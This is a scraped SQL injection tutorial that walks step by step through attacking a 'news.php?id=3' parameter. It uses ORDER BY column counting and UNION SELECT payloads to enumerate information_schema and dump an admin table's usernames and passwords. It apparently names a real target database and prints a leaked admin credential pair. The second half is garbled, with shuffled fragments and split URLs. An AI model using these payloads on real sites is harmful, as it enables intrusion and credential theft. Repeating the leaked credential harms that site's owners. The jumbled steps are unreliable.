Step 1: Finding Vulnerable Link www.site.com/news.php?

id=3 Add ' After id=3 If Error is shown or blank page then site is Vulnerable Step 2: Finding Vulnerable Columns www.site.com/news.php?id=3 order by 8 -if again error is shown or blank page occured then Vulnerable columns are 7. Step 3: Finding Number of Vulnerable Columns: www.site.com/news.php?id=3 union all select 1,2,3,4,5,6,7 -to SQL Injection.

if number 2 is shown then this column can give us Step 4 Finding Database union all select 1,database(),3,4,5,6,7 -chennaisilks Step 5: Finding Table Names: www.site.com/news.php?id=3 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='chennaisilks' -Step 6: Finding Column Names: www.site.com/news/php?id=3

database,tables & columns

union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='chennaisilks' -Admin table is admin

6.php .3.4.php?id=3 union all select 1.site. admin_pwd from admin -Step 7: finding Admin Link: www.aspx add ' or /* or ') In case of .add ' after id=3 .user_id.5.7 from admin -union all select 1.php?id=3 union all select 1.asp use /* for ending series of commands.com/news.com/admin .admin_pwd.site.com/news. .7 from admin -admin:jan10ecom10jan www.5.3.asp add ' or /* or ') .6.Admin Columns are admin_id user_id admin_pwd admin_email admin_last_login admin_ip Step 6: Finding Admin username & password: www.4.site.

Sign up to vote on this title
UsefulNot useful